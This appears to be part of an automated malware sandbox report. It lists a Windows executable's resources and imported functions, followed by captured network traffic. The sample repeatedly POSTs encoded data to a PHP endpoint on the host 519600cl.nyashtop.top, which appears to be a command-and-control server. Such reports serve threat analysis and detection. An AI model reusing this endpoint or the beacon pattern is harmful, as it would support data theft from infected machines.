.rsrc	0x19000	0x1400	0x1400	0bda792e1a4385a8c5dce49ce9bdec9e	False	0.1302734375	data	1.296744017426327	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x19150	0x10a8	data	Russian	Russia	0.006332082551594747
RT_RCDATA	0x1a1f8	0x10	data			1.5
RT_RCDATA	0x1a208	0xac	data			1.063953488372093
RT_GROUP_ICON	0x1a2b4	0x14	data	Russian	Russia	1.1

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, MessageBoxA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
gdi32.dll	StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll	ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
shell32.dll	ShellExecuteA, ExtractIconA

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:10:49.373811007 CET	54387	53	192.168.2.4	1.1.1.1
Jan 13, 2025 13:10:49.571589947 CET	53	54387	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:49.611191988 CET	284	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:10:49.974989891 CET	344	OUT	Data Raw: 00 07 01 01 03 0d 01 00 05 06 02 01 02 01 01 0b 00 04 05 00 02 0d 03 00 02 05 0e 06 07 06 03 05 0a 00 06 5d 00 00 06 52 0e 0b 02 01 05 0b 04 02 04 07 0b 0f 0f 02 06 07 01 07 04 53 05 02 07 5b 01 0a 0c 0c 07 55 06 51 0c 04 0e 54 0f 51 0f 02 07 53 Data Ascii: ]RS[UQTQSW\L~A\|YzvaqOb[^OhUj_tR`k]ZJ{R]Hxp~hnQcgZ~O~V@z}TbW
Jan 13, 2025 13:10:50.254040956 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:50.334892035 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1312 Connection: keep-alive Data Raw: 56 4a 7d 5d 6c 43 73 49 78 4c 5a 49 7e 61 55 00 69 74 7b 0a 7e 60 57 0d 6e 63 52 00 69 61 7b 5c 60 5a 79 4f 6e 71 57 4a 75 58 64 06 7d 61 78 01 55 4b 71 42 60 62 59 44 7f 62 62 5f 7d 74 66 0c 7b 48 74 08 7e 73 63 02 77 72 5c 5c 74 61 7d 05 7f 61 58 00 7d 0a 6c 09 6a 77 59 01 76 66 7b 06 7c 5c 5c 5d 6a 5e 72 5a 6f 67 6c 07 78 49 51 59 78 6d 63 48 79 62 5e 46 7b 4d 7e 04 7f 4e 5a 00 79 77 67 5f 7d 04 64 5a 75 07 78 02 7a 51 41 5b 68 67 68 4f 7f 4f 50 54 61 52 52 4e 7b 6c 7c 00 77 63 6e 40 79 07 6d 05 6a 42 54 4e 78 5f 54 03 62 60 7b 44 61 07 67 5b 76 72 72 50 7e 5d 7a 06 76 72 6d 05 76 65 52 09 68 52 65 04 60 6f 60 04 7f 60 7c 01 6f 6c 67 03 7b 5e 66 4a 6b 6d 60 08 60 59 6f 5c 69 62 61 50 7e 7e 67 41 78 6d 72 06 69 62 61 04 7b 5d 46 51 68 7f 68 0a 7e 59 60 42 7d 64 7e 4e 7a 7d 70 5a 6c 5c 52 4b 7c 07 74 5e 69 67 7f 08 68 5e 65 41 6d 60 77 5f 69 62 52 46 76 60 79 51 7b 5c 79 01 77 66 74 48 7e 58 56 06 7d 58 75 0b 77 72 67 44 7f 4c 75 06 7f 77 66 4e 78 66 74 41 7c 63 51 4a 76 4c 5b 03 74 4f 69 47 7e 71 [TRUNCATED] Data Ascii: VJ}]lCsIxLZI~aUit{~`WncRia{\`ZyOnqWJuXd}axUKqB`bYDbb_}tf{Ht~scwr\\ta}aX}ljwYvf{\|\\]j^rZoglxIQYxmcHyb^F{M~NZywg_}dZuxzQA[hghOOPTaRRN{l\|wcn@ymjBTNx_Tb`{Dag[vrrP~]zvrmveRhRe`o``\|olg{^fJkm``Yo\ibaP~~gAxmriba{]FQhh~Y`B}d~Nz}pZl\RK\|t^igh^eAm`w_ibRFv`yQ{\ywftH~XV}XuwrgDLuwfNxftA\|cQJvL[tOiG~qT~lp@}wwKu_sGxL}~`yJxY^{YtymcIyL`xMv}`lxIx}b{Nv_`G\|lU}ghAqSvlt{RdIvp\zqS}lbO{qvFu]cKwadvqf\|`ztrmv[xABuv\|`~stxRoxpPD}\|vw`O~Lf~CcOz}v}bWNZ@Bl}^Z}g~CxCyb`~qUJ~gs\|N[zMh}\RKwcqB{aSuvR~Hhvuw\QK\|riM}g~xv\|~Msu\_wqiG\|_rH\|^~IQwawIx\q}^mIxYxLyghM{mYzb\|H{cn{]NZogxj\UvaYY~ogkd}qS@acZxBk[`mPzOnZ}\|T_z\yvxBagx[L~Jx^Twb\^wu{RuwU`k]ZKxlUK{}Xkm{Qcdhb_RzSYQ`qEbfBhl{PV@y]FQ}Iu\xSp[xLk]~rd[\|d\|She@n`cXqYt]Wyq[Jvfx[\|\B^jnNZqJh\@jyUUjoTPcYw_qu_i}_vH}AAwYZtvx^oaGQ\|n]WdRoUSj{~]]QNulPsAv{CW~]^tv^ioEP{gVSb_[UoXToDp^XP`Xbz~_@VX@Xtt\|]bbA[}aWPcQZ[n[YfM`^ckpx^p@UR^Wq@Vn]I[_OjaSHQwlnZy\_^ [TRUNCATED]
Jan 13, 2025 13:10:50.334912062 CET	233	IN	Data Raw: 59 50 05 66 40 56 7b 79 0c 62 5f 7f 4c 69 64 7b 06 71 5a 6e 43 58 6d 6a 5c 6b 76 71 65 54 7f 73 09 6a 6b 7f 54 5a 07 6b 57 64 61 09 5c 50 59 54 59 6f 60 70 47 7f 5e 5d 59 54 0a 70 42 53 61 51 41 57 5b 0e 5c 50 06 0c 03 57 64 00 5f 51 58 64 73 5a Data Ascii: YPf@V{yb_Lid{qZnCXmj\kvqeTsjkTZkWda\PYTYo`pG^]YTpBSaQAW[\PWd_QXdsZg\zRY[{ZFQhbO[Ao]DayOV[f@QUeCQpYZ`cZw\\|_uv}Wkc@[~n[Yf^SvX`kkplZyQ[ywy]hnN[{oXQa^Q~Mo[Tab[{^^Q{QNPjgNPtOo^FncASbdQTx^_Q}YVg
Jan 13, 2025 13:10:52.025785923 CET	260	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 384 Expect: 100-continue
Jan 13, 2025 13:10:52.220942974 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:52.221185923 CET	384	OUT	Data Raw: 5f 59 5e 56 51 45 54 55 5a 5d 56 56 52 5c 50 53 50 5f 55 55 57 5e 5a 5d 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Y^VQETUZ]VVR\PSP_UUW^Z]T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ .0"!"2#C>:'8>3X<V)\0R3%<'01+<.'F!.\1
Jan 13, 2025 13:10:52.486850977 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 54 2a 25 22 1d 24 17 23 0e 2f 3f 2a 58 3a 02 2c 00 2a 0c 01 04 29 5c 3a 02 2d 58 28 5a 3c 05 0d 03 2b 1f 02 1d 24 36 06 57 3d 03 2b 51 07 11 39 5c 25 03 26 15 3c 0a 36 58 30 1c 08 0a 35 23 2b 04 28 2a 31 0b 25 28 2f 0b 2b 38 29 58 2a 0d 3a 58 31 5f 39 0a 3c 2c 22 13 3f 07 2f 5e 08 12 25 57 2a 57 25 50 26 23 28 02 21 3f 34 5f 29 2f 04 08 35 3f 0f 0c 3d 03 39 5c 27 3e 21 1c 26 2e 31 00 26 21 23 0a 32 0c 3e 02 30 13 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !T%"$#/?X:,)\:-X(Z<+$6W=+Q9\%&<6X05#+(1%(/+8)X:X1_9<,"?/^%WW%P&#(!?4_)/5?=9\'>!&.1&!#2>0$P/,Q=ZW
Jan 13, 2025 13:10:52.790344000 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 1652 Expect: 100-continue
Jan 13, 2025 13:10:52.978502989 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:52.984688997 CET	1652	OUT	Data Raw: 5f 5a 5b 53 54 40 51 54 5a 5d 56 56 52 5e 50 59 50 5d 55 59 57 56 5a 5c 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Z[ST@QTZ]VVR^PYP]UYWVZ\T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#;0&5%14)03W0-#):329(),Z$0<'F!.\*9
Jan 13, 2025 13:10:54.580615997 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 1f 28 26 35 0d 33 29 23 0a 3b 05 32 1d 2e 3c 0a 07 29 0c 30 17 2a 14 25 5e 2c 3d 20 5b 3e 2b 37 05 3c 0f 02 51 25 25 27 0e 2a 29 2b 51 07 11 39 14 26 5b 3a 5d 3c 33 22 12 24 21 2a 0a 22 0a 3f 04 3c 29 04 50 27 06 3f 0f 2b 5e 39 5b 3d 33 04 5c 26 2a 3e 18 28 02 21 07 3c 17 2f 5e 08 12 26 09 3d 31 2d 12 25 1e 19 11 20 2f 28 14 3d 06 2e 0d 23 2c 3e 50 2a 04 3d 58 27 3e 1c 01 26 2e 22 5c 26 1c 3b 0b 31 0c 35 11 27 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !(&53)#;2.<)0%^,= [>+7<Q%%')+Q9&[:]<3"$!"?<)P'?+^9[=3\&>(!</^&=1-% /(=.#,>P*=X'>&."\&;15'9$P/,Q=ZW
Jan 13, 2025 13:10:54.580848932 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 1f 28 26 35 0d 33 29 23 0a 3b 05 32 1d 2e 3c 0a 07 29 0c 30 17 2a 14 25 5e 2c 3d 20 5b 3e 2b 37 05 3c 0f 02 51 25 25 27 0e 2a 29 2b 51 07 11 39 14 26 5b 3a 5d 3c 33 22 12 24 21 2a 0a 22 0a 3f 04 3c 29 04 50 27 06 3f 0f 2b 5e 39 5b 3d 33 04 5c 26 2a 3e 18 28 02 21 07 3c 17 2f 5e 08 12 26 09 3d 31 2d 12 25 1e 19 11 20 2f 28 14 3d 06 2e 0d 23 2c 3e 50 2a 04 3d 58 27 3e 1c 01 26 2e 22 5c 26 1c 3b 0b 31 0c 35 11 27 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !(&53)#;2.<)0%^,= [>+7<Q%%')+Q9&[:]<3"$!"?<)P'?+^9[=3\&>(!</^&=1-% /(=.#,>P*=X'>&."\&;15'9$P/,Q=ZW
Jan 13, 2025 13:10:54.581446886 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 1f 28 26 35 0d 33 29 23 0a 3b 05 32 1d 2e 3c 0a 07 29 0c 30 17 2a 14 25 5e 2c 3d 20 5b 3e 2b 37 05 3c 0f 02 51 25 25 27 0e 2a 29 2b 51 07 11 39 14 26 5b 3a 5d 3c 33 22 12 24 21 2a 0a 22 0a 3f 04 3c 29 04 50 27 06 3f 0f 2b 5e 39 5b 3d 33 04 5c 26 2a 3e 18 28 02 21 07 3c 17 2f 5e 08 12 26 09 3d 31 2d 12 25 1e 19 11 20 2f 28 14 3d 06 2e 0d 23 2c 3e 50 2a 04 3d 58 27 3e 1c 01 26 2e 22 5c 26 1c 3b 0b 31 0c 35 11 27 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !(&53)#;2.<)0%^,= [>+7<Q%%')+Q9&[:]<3"$!"?<)P'?+^9[=3\&>(!</^&=1-% /(=.#,>P*=X'>&."\&;15'9$P/,Q=ZW
Jan 13, 2025 13:10:54.582101107 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 1f 28 26 35 0d 33 29 23 0a 3b 05 32 1d 2e 3c 0a 07 29 0c 30 17 2a 14 25 5e 2c 3d 20 5b 3e 2b 37 05 3c 0f 02 51 25 25 27 0e 2a 29 2b 51 07 11 39 14 26 5b 3a 5d 3c 33 22 12 24 21 2a 0a 22 0a 3f 04 3c 29 04 50 27 06 3f 0f 2b 5e 39 5b 3d 33 04 5c 26 2a 3e 18 28 02 21 07 3c 17 2f 5e 08 12 26 09 3d 31 2d 12 25 1e 19 11 20 2f 28 14 3d 06 2e 0d 23 2c 3e 50 2a 04 3d 58 27 3e 1c 01 26 2e 22 5c 26 1c 3b 0b 31 0c 35 11 27 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !(&53)#;2.<)0%^,= [>+7<Q%%')+Q9&[:]<3"$!"?<)P'?+^9[=3\&>(!</^&=1-% /(=.#,>P*=X'>&."\&;15'9$P/,Q=ZW

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:52.800759077 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:10:53.157917023 CET	2580	OUT	Data Raw: 5a 58 5e 54 54 45 51 56 5a 5d 56 56 52 5c 50 58 50 59 55 59 57 50 5a 58 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: ZX^TTEQVZ]VVR\PXPYUYWPZXT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ ,U%["=1#E+)#'8!$.<T>,32<3$<^(.'F!.\1
Jan 13, 2025 13:10:53.438255072 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:54.580729008 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:10:54.580782890 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:10:54.580935955 CET	183	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 33 20 4a 61 6e 20 32 30 32 35 20 31 32 3a 31 30 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3e 5d 58 5a Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Jan 2025 12:10:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive>]XZ
Jan 13, 2025 13:10:54.581856012 CET	183	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 33 20 4a 61 6e 20 32 30 32 35 20 31 32 3a 31 30 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3e 5d 58 5a Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 13 Jan 2025 12:10:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive>]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:54.921469927 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:10:55.267093897 CET	2580	OUT	Data Raw: 5a 5d 5b 54 54 42 51 56 5a 5d 56 56 52 5d 50 5f 50 59 55 5e 57 57 5a 5f 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z][TTBQVZ]VVR]P_PYU^WWZ_T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#], 2^%3++)3'50?)'$"9+<^$!^)>'F!.\*5
Jan 13, 2025 13:10:55.578768969 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:55.711286068 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:55.601914883 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 1904 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:10:55.954674959 CET	1904	OUT	Data Raw: 5a 55 5e 53 51 45 54 5d 5a 5d 56 56 52 5f 50 5d 50 50 55 55 57 52 5a 5c 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: ZU^SQET]Z]VVR_P]PPUUWRZ\T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#83!_"1>2U8):$$>?>9 R&">?'0^+'F!.\*
Jan 13, 2025 13:10:56.261442900 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:56.393408060 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 22 0c 2a 1c 29 0e 24 2a 3f 0c 3b 2f 32 5f 2e 3f 30 05 29 32 0a 5a 3d 04 21 16 2c 3e 27 05 28 38 34 59 3c 21 09 0f 27 35 28 56 2b 29 2b 51 07 11 3a 05 26 5b 32 5f 3f 1d 3e 1d 27 32 29 18 22 30 38 17 28 39 0f 0a 27 28 3c 56 3f 38 07 10 2a 23 22 58 26 29 29 40 3f 3c 3a 13 2b 2d 2f 5e 08 12 25 1b 3d 31 00 08 25 09 38 02 36 3f 0e 5b 28 3f 21 18 36 3f 39 0b 2a 3a 31 5f 30 2e 31 5f 24 58 32 11 32 0c 0e 10 26 22 21 5a 24 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: ")$?;/2_.?0)2Z=!,>'(84Y<!'5(V+)+Q:&[2_?>'2)"08(9'(<V?8#"X&))@?<:+-/^%=1%86?[(?!6?9:1_0.1_$X22&"!Z$9$P/,Q=ZW

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:56.115309000 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:10:56.470263958 CET	2580	OUT	Data Raw: 5a 5b 5e 52 54 45 54 56 5a 5d 56 56 52 5a 50 58 50 5f 55 59 57 54 5a 5e 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z[^RTETVZ]VVRZPXP_UYWTZ^T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#/#\!9&?+:(38W'+\<W02^<9$1Z)>'F!.\*)
Jan 13, 2025 13:10:56.744123936 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:56.873718023 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:57.401386023 CET	263	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 153484 Expect: 100-continue
Jan 13, 2025 13:10:57.751668930 CET	12360	OUT	Data Raw: 5f 5a 5b 52 51 47 54 53 5a 5d 56 56 52 5c 50 5b 50 5d 55 58 57 52 5a 5b 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Z[RQGTSZ]VVR\P[P]UXWRZ[T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#Z80="!)$34+)?]3.%.#>:(39?_?$1?'F!.\*1
Jan 13, 2025 13:10:57.756802082 CET	2472	OUT	Data Raw: 3e 2a 2f 35 13 00 36 19 31 57 29 05 26 25 32 34 28 02 0b 04 3f 5c 1e 05 37 3c 5c 1a 28 21 0b 50 25 22 02 21 36 3c 54 29 06 2d 3a 08 0f 2e 03 50 35 2d 51 06 0e 58 3e 3a 27 10 3d 05 3a 20 0e 1f 3d 31 36 25 38 3e 3b 07 28 21 2b 1f 3d 0b 24 58 3e 02 Data Ascii: >/561W)&%24(?\7<\(!P%"!6<T)-:.P5-QX>:'=: =16%8>;(!+=$X>)Z ,\<10?4 )7&>=:84-U09='V(;50)>9US4#$:0!05]:A_3(92"5?,591A^?)=)"C)</ 31?2#$(&&4?/+$<\=</9QZWQ,/)919!
Jan 13, 2025 13:10:57.756843090 CET	12360	OUT	Data Raw: 30 28 26 10 25 3e 2c 31 32 40 1e 1a 31 5b 22 1c 3a 06 22 2d 35 1c 13 2d 3b 06 01 14 00 2c 29 33 35 3f 57 59 31 56 1d 5b 2a 36 1b 5f 36 2e 09 20 2b 2c 11 2a 04 32 2f 2f 3d 0c 3b 55 00 32 06 10 00 2d 3a 38 0e 2e 1b 38 2d 57 0c 12 3d 20 0f 23 3b 55 Data Ascii: 0(&%>,12@1[":"-5-;,)35?WY1V[6_6. +,2//=;U2-:8.8-W= #;UT5^Q84;>(94U;2^>"?X5[618#6!:1?05Z7#/:1>^>!^=A""Y%0$=S3V#9W#3,_^>7V1'$524\?V0%%98;>?;$)U!V6@1(%'\=/;T6;%R94*3_ '
